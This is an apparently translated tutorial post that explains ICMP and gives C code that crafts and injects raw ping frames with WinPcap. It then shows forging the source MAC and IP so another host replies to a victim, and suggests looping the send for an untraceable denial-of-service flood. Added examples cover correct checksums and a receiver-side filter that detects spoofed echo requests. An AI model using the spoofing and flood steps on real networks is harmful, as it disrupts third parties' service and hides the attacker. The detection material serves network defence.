Ping-flooding attack using WinPcap



ICMP protocol



ICMP is one of the components of the TCP/IP (Transmission Control Protocol / Internet Protocol) stack and compensates for the inability of IP to deliver data reliably. It does not make IP delivery reliable: it only notifies the sender of the data that there was a problem delivering it.

The figure shows where ICMP sits in the TCP/IP model.


ICMP is the error-reporting mechanism for IP.
If an error occurs while a datagram is being delivered, ICMP reports it to the sender of the datagram. For example, suppose PC1 in the following figure sends a datagram to PC4. If the relevant interface of the border router is down, the router uses ICMP to send PC1 a message saying that the datagram could not be delivered. ICMP does not fix the problem on the network; it only reports it.


ICMP messages are delivered using IP.
ICMP messages are encapsulated in IP datagrams, exactly like ordinary data carried over IP. The table shows the ICMP packet encapsulated in the data field of the IP datagram. The frame header can be that of a LAN protocol such as Ethernet, or of a WAN protocol such as HDLC.


Frame header | IP datagram header | ICMP header | ICMP protocol data
             |                    |       IP datagram data field     |
             |                 frame data field                      |


When data arrives at the network layer it is encapsulated in a datagram; the datagram, with the data inside it, is then encapsulated in a frame at the data link layer. ICMP messages carry their own information in their headers, but that header, together with the ICMP data, is encapsulated in a datagram and transmitted in the same way as all other data. Error messages are therefore just as likely to be lost in transit as anything else. Worse, error messages could themselves cause new errors, which would only add to the congestion on a network that is already failing. For this reason, an error in delivering an ICMP error message does not generate an ICMP message of its own. Therefore, there may be a case when an error occurs during the delivery of the datagram,

Building and sending pings with WinPcap


Everyone knows the ping command, which sends an ICMP echo request and waits for an echo reply. We decided that the system ping was not enough for us and set out to write our own.
The tools were a C++ compiler and the WinPcap library. WinPcap is a low-level library for talking to network interface drivers; it lets a program hand the driver a complete Ethernet frame, all headers included, which is what makes the experiments below possible.
So we begin assembling the ICMP packet.
The ICMP packet format was taken from the Wiki.

Octet   Bits 0-7   Bits 8-15   Bits 16-31
0-3     Type       Code        Checksum
4-...   Data (format depends on the values of the Type and Code fields)


#include <stdio.h>
#include <winsock2.h>   // htons, ntohs, WORD, DWORD
#include <pcap.h>       // WinPcap: pcap_open_live, pcap_sendpacket

// RFC 1071 one's-complement checksum over the 16-bit words as they lie in
// memory. The result is already in network byte order, so it can be stored
// into the packet with a plain 16-bit write.
WORD ComputeIPChecksum(const u_char *data, int len)
{
	DWORD sum = 0;
	const WORD *w = (const WORD *)data;
	for (; len > 1; len -= 2)
		sum += *w++;
	if (len == 1)
		sum += *(const u_char *)w;
	while (sum >> 16)
		sum = (sum & 0xffff) + (sum >> 16);
	return (WORD)~sum;
}

int main(int argc, char *argv[])
{
	char errbuf[PCAP_ERRBUF_SIZE];
	pcap_t *fp;
	u_char packet[1514]; // our frame
	WORD chS;
	int i;

	if (argc != 2) {
		fprintf(stderr, "usage: %s <adapter name as listed by pcap_findalldevs>\n", argv[0]);
		return 1;
	}
	// open the adapter: snaplen 65536, promiscuous mode, 1 s read timeout
	if ((fp = pcap_open_live(argv[1], 65536, 1, 1000, errbuf)) == NULL) {
		fprintf(stderr, "Unable to open the adapter: %s\n", errbuf);
		return 2;
	}

	// destination MAC
	packet[0]=0x08;
	packet[1]=0x00;
	packet[2]=0x27;
	packet[3]=0x4c;
	packet[4]=0x18;
	packet[5]=0xDA;
	// source MAC
	packet[6]=0x08;
	packet[7]=0x00;
	packet[8]=0x27;
	packet[9]=0xca;
	packet[10]=0xb8;
	packet[11]=0x44;
	// EtherType 0x0800 = IPv4
	packet[12]=0x08;
	packet[13]=0x00;
	// IP header: version 4, header length 5*4 = 20 bytes, TOS 0
	packet[14]=0x45;
	packet[15]=0x00;
	// total length of the IP datagram: 1514-byte frame minus 14-byte Ethernet header
	*(WORD *)&packet[16] = htons(1500);
	packet[18]=0x11; // identification
	packet[19]=0x22;
	packet[20]=0;    // flags and fragment offset: no fragmentation
	packet[21]=0;
	packet[22]=0x80; // TTL
	packet[23]=1;    // protocol: ICMP
	packet[24]=0;    // header checksum, zero while it is being computed
	packet[25]=0;
	// source IP
	packet[26]=192;
	packet[27]=168;
	packet[28]=1;
	packet[29]=1;
	// destination IP
	packet[30]=192;
	packet[31]=168;
	packet[32]=1;
	packet[33]=128;
	chS=ComputeIPChecksum(&packet[14],20); // IP header checksum covers the header only
	printf("IP checksum: %04x\n", ntohs(chS));
	*(WORD *)&packet[24] = chS;
	//****************************************************
	packet[34]=8;    // ICMP type: echo request
	packet[35]=0;    // code
	packet[36]=0;    // ICMP checksum, zero while it is being computed
	packet[37]=0;
	packet[38]=0x11; // identifier
	packet[39]=0x11;
	packet[40]=0x22; // sequence number
	packet[41]=0x22;
	// payload
	for(i=42; i<1514; i++)
	{
		packet[i]= 'A';
	}
	// the ICMP checksum covers the whole ICMP message, header plus payload;
	// for this payload it comes out as 0x2931
	chS=ComputeIPChecksum(&packet[34], 1514-34);
	printf("ICMP checksum: %04x\n", ntohs(chS));
	*(WORD *)&packet[36] = chS;
	// send
	if (pcap_sendpacket(fp,	// adapter
			packet,			// buffer with the packet
			1514			// size
			) != 0)
	{
		fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp));
		pcap_close(fp);
		return 3;
	}
	pcap_close(fp);
	return 0;
}
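The ICMP checksum of the frame above is right only for exactly this 1472-byte payload of 'A'; change one byte and it has to be recomputed over the whole ICMP message, not just the 8-byte header. The following is an added example, not the post's code: it assembles the same frame (same MACs, 192.168.1.1 to 192.168.1.128, identifier 0x1111, sequence 0x2222, 'A' payload) from explicit offsets with both checksums computed, and then walks the encapsulation from the table in the ICMP section (frame, IP datagram, ICMP message) and verifies each checksum on the way in. It needs no WinPcap and nothing in it is Windows-specific.

```c
#include <stdint.h>
#include <string.h>

/* Layout of the post's frame: 14-byte Ethernet header, 20-byte IPv4 header,
 * 8-byte ICMP echo header and 1472 bytes of payload = 1514 bytes. */
#define FRAME_LEN 1514
#define ETH_HLEN  14
#define IP_HLEN   20
#define ICMP_HLEN 8

/* RFC 1071 Internet checksum over big-endian 16-bit words; the result is a
 * host-order number that put16() writes to the wire in network order. */
static uint16_t inet_checksum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; len -= 2, p += 2)
        sum += (uint32_t)(p[0] << 8 | p[1]);
    if (len)                                  /* odd trailing byte */
        sum += (uint32_t)p[0] << 8;
    while (sum >> 16)                         /* fold carries back in */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static uint16_t get16(const uint8_t *p)    { return (uint16_t)(p[0] << 8 | p[1]); }

/* Build the echo request the post assembles by hand: same MACs, addresses,
 * identifier, sequence number and 'A' payload. Returns the frame length. */
size_t build_echo_frame(uint8_t *f)
{
    static const uint8_t dst_mac[6] = {0x08,0x00,0x27,0x4c,0x18,0xda};
    static const uint8_t src_mac[6] = {0x08,0x00,0x27,0xca,0xb8,0x44};
    static const uint8_t src_ip[4]  = {192,168,1,1};
    static const uint8_t dst_ip[4]  = {192,168,1,128};
    uint8_t *ip = f + ETH_HLEN, *icmp = ip + IP_HLEN;

    memset(f, 0, FRAME_LEN);
    /* Ethernet II header: destination, source, EtherType 0x0800 (IPv4) */
    memcpy(f, dst_mac, 6);
    memcpy(f + 6, src_mac, 6);
    put16(f + 12, 0x0800);
    /* IPv4 header: version 4 / IHL 5, TOS 0, total length 1500, id 0x1122,
     * flags and fragment offset 0, TTL 128, protocol 1 (ICMP), addresses */
    ip[0] = 0x45;
    put16(ip + 2, FRAME_LEN - ETH_HLEN);
    put16(ip + 4, 0x1122);
    ip[8] = 0x80;
    ip[9] = 1;
    memcpy(ip + 12, src_ip, 4);
    memcpy(ip + 16, dst_ip, 4);
    put16(ip + 10, inet_checksum(ip, IP_HLEN));  /* header checksum: header only */
    /* ICMP echo request: type 8, code 0, checksum, identifier, sequence, data */
    icmp[0] = 8;
    put16(icmp + 4, 0x1111);
    put16(icmp + 6, 0x2222);
    memset(icmp + ICMP_HLEN, 'A', FRAME_LEN - ETH_HLEN - IP_HLEN - ICMP_HLEN);
    /* ICMP checksum: the whole message, header and payload (0x2931 here) */
    put16(icmp + 2, inet_checksum(icmp, FRAME_LEN - ETH_HLEN - IP_HLEN));
    return FRAME_LEN;
}

/* What the decoder recovers from each layer of the encapsulation. */
struct decoded {
    uint16_t ethertype, ip_total_len, icmp_len, icmp_id, icmp_seq;
    uint8_t  ip_proto, icmp_type, icmp_code;
    int      ip_csum_ok, icmp_csum_ok;
};

/* Walk frame -> IP datagram -> ICMP message. Returns 0 on success, -1 if the
 * frame is truncated or is not IPv4 carrying ICMP. */
int decode_frame(const uint8_t *f, size_t len, struct decoded *d)
{
    memset(d, 0, sizeof *d);
    if (len < ETH_HLEN + IP_HLEN) return -1;
    d->ethertype = get16(f + 12);
    if (d->ethertype != 0x0800) return -1;
    const uint8_t *ip = f + ETH_HLEN;
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;
    if ((ip[0] >> 4) != 4 || ihl < IP_HLEN || len < ETH_HLEN + ihl) return -1;
    d->ip_total_len = get16(ip + 2);
    d->ip_proto = ip[9];
    /* recomputing over data that already holds its checksum gives 0 if intact */
    d->ip_csum_ok = inet_checksum(ip, ihl) == 0;
    if (d->ip_proto != 1 || d->ip_total_len < ihl + ICMP_HLEN ||
        len < ETH_HLEN + d->ip_total_len) return -1;
    const uint8_t *icmp = ip + ihl;
    d->icmp_len  = (uint16_t)(d->ip_total_len - ihl);
    d->icmp_type = icmp[0];
    d->icmp_code = icmp[1];
    d->icmp_id   = get16(icmp + 4);
    d->icmp_seq  = get16(icmp + 6);
    d->icmp_csum_ok = inet_checksum(icmp, d->icmp_len) == 0;
    return 0;
}
```

Call build_echo_frame() into a 1514-byte buffer and hand it to pcap_sendpacket() exactly as the post does; the bytes at offsets 24-25 come out as A0 2D (IP header checksum) and at 36-37 as 29 31, the ICMP value the post uses. decode_frame() is the receiver's half: it refuses truncated or non-ICMP frames instead of reading past the buffer, and reports each checksum separately, so a corrupted payload shows up as a bad ICMP checksum while the IP header still verifies.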


The result is shown in the following figure.



We see the request and the reply. All OK.
But what if we put a bogus MAC address in the sender field?
What if we put a bogus IP address in the sender field?
And what if the sender MAC is FF-FF-FF-FF-FF-FF?


The Wiki says the following:

ICMP packets are never generated in response to IP packets with a broadcast or multicast address, so as not to cause network congestion (the so-called "broadcast storm").

Let's try to break this rule. From a machine with IP 192.168.1.2 we send a ping to 192.168.1.3, with the sender's IP set to 192.168.1.1 and the sender's MAC set to FF-FF-FF-FF-FF-FF.

It turned out that we forced 192.168.1.3 to reply to 192.168.1.1, even though the latter never asked for anything. The most interesting part is that this was a broadcast ping and it went through! Strictly speaking, the rule above is about the destination address; here the broadcast address sat in the source MAC of the frame, and the host accepted the frame and answered the forged source IP anyway.

Now look at the other machines.


On the other machines we capture the broadcast frames as well.
And if so, wrap the send in a while(1) loop and you have a DoS attack: every iteration makes the target answer a source that never asked, and because both the source MAC and the source IP are forged, nothing in the frame points back at the machine actually sending it.
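What the experiment shows is that the receiving host accepted a frame whose source MAC is the broadcast address and replied to whatever source IP the frame claimed. The following added example (not the post's code) is the receiver's side of that: classify_frame() flags an IPv4/ICMP frame whose source MAC has the group bit set (which covers FF-FF-FF-FF-FF-FF; IEEE 802.3 requires an individual source address), whose source IP is a broadcast address (RFC 1122 says to discard such datagrams), or whose source IP is the receiver's own address, and echo_rate_exceeded() counts echo requests per source in one-second buckets to catch the while(1) loop. The victim address 192.168.1.3, the /24 network, the 100-per-second threshold and the sample frames built by make_echo() are assumptions of the example.

```c
#include <stdint.h>
#include <string.h>

/* Anomaly flags returned by classify_frame(). */
enum {
    F_NOT_IPV4_ICMP = 1,   /* not an IPv4 frame carrying ICMP, or truncated */
    F_SRC_MAC_GROUP = 2,   /* source MAC has the I/G bit set (multicast/broadcast) */
    F_SRC_IP_BCAST  = 4,   /* source IP is a broadcast address */
    F_SRC_IP_SELF   = 8,   /* source IP is our own address (reflected traffic) */
    F_ICMP_ECHO_REQ = 16   /* ICMP type 8, echo request */
};

/* Assumed for the example: we are the host the post pings, on 192.168.1.0/24. */
static const uint8_t OUR_IP[4] = {192, 168, 1, 3};

int classify_frame(const uint8_t *f, size_t len)
{
    int flags = 0;
    if (len < 34 || (f[12] << 8 | f[13]) != 0x0800) return F_NOT_IPV4_ICMP;
    const uint8_t *ip = f + 14;
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;
    if (ihl < 20 || len < 14 + ihl + 8 || ip[9] != 1) return F_NOT_IPV4_ICMP;
    /* IEEE 802.3 requires an individual (unicast) source address; bit 0 of the
     * first octet set means a group address, and FF:FF:FF:FF:FF:FF is one */
    if (f[6] & 0x01) flags |= F_SRC_MAC_GROUP;
    const uint8_t *src = ip + 12;
    /* RFC 1122 3.2.1.3: silently discard datagrams with a broadcast source;
     * the /24 directed-broadcast test is an assumption of this example */
    if (src[3] == 255 || memcmp(src, "\xff\xff\xff\xff", 4) == 0) flags |= F_SRC_IP_BCAST;
    if (memcmp(src, OUR_IP, 4) == 0) flags |= F_SRC_IP_SELF;
    if (ip[ihl] == 8) flags |= F_ICMP_ECHO_REQ;
    return flags;
}

/* Echo requests per source IP in one-second buckets; ECHO_LIMIT is an
 * assumed threshold, not a value from the post. */
#define MAX_SRC    16
#define ECHO_LIMIT 100
struct src_counter { uint32_t ip, sec, count; };
static struct src_counter table[MAX_SRC];

/* Returns 1 for every echo request beyond ECHO_LIMIT from one source within
 * the same second, 0 otherwise (including for frames that are not echo requests). */
int echo_rate_exceeded(const uint8_t *f, size_t len, uint32_t now_sec)
{
    if (!(classify_frame(f, len) & F_ICMP_ECHO_REQ)) return 0;
    uint32_t ip;
    memcpy(&ip, f + 26, 4);                 /* raw source IP; byte order is irrelevant */
    struct src_counter *slot = NULL;
    for (int i = 0; i < MAX_SRC; i++) {
        if (table[i].count && table[i].ip == ip) { slot = &table[i]; break; }
        if (!table[i].count && !slot) slot = &table[i];
    }
    if (!slot) return 0;                    /* table full: assumed policy, no alert */
    if (!slot->count || slot->sec != now_sec) {   /* new source or a new second */
        slot->ip = ip; slot->sec = now_sec; slot->count = 0;
    }
    return ++slot->count > ECHO_LIMIT;
}

/* Constructed 42-byte echo request carrying only the fields the checks read. */
void make_echo(uint8_t *f, const uint8_t src_mac[6], const uint8_t src_ip[4])
{
    memset(f, 0, 42);
    memcpy(f + 6, src_mac, 6);              /* source MAC */
    f[12] = 0x08; f[13] = 0x00;             /* EtherType IPv4 */
    f[14] = 0x45;                           /* version 4, IHL 5 */
    f[23] = 1;                              /* protocol ICMP */
    memcpy(f + 26, src_ip, 4);              /* source IP */
    memcpy(f + 30, OUR_IP, 4);              /* destination IP: us */
    f[34] = 8;                              /* echo request */
}
```

Feed every captured frame through classify_frame() before the stack or the sensor acts on it: the post's spoofed frame comes back as F_SRC_MAC_GROUP | F_ICMP_ECHO_REQ and should be dropped rather than answered, which is what stops the reflected reply to 192.168.1.1. The rate counter is deliberately simple (fixed buckets, no eviction); a production sensor would use a sliding window and age entries out, but the shape of the check is the same.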

References:

Odom W. CCENT/CCNA ICND1 Official Exam Certification Guide. Cisco Press, 2010.
en.wikipedia.org (Internet Control Message Protocol)
